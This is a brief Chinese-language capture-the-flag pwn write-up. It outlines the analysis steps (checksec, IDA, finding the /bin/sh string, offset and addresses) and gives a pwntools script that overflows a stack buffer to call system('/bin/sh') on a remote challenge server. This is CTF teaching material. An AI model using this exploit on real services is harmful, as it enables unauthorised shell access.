題目分析
題目提示
下載文件后首先使用checksec檢查文件保護機制
使用ida打開,查看偽代碼
搜索字符串發現/bash/sh
信息收集
偏移量
system的地址
/bin/sh的地址
編寫腳本
from pwn import *
p = remote('111.198.29.45',50136)
#p = process("./pwn003")
binsh = 0x0804A024
system = 0x8048320
payload = "A"*0x88+"B"*0x4+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()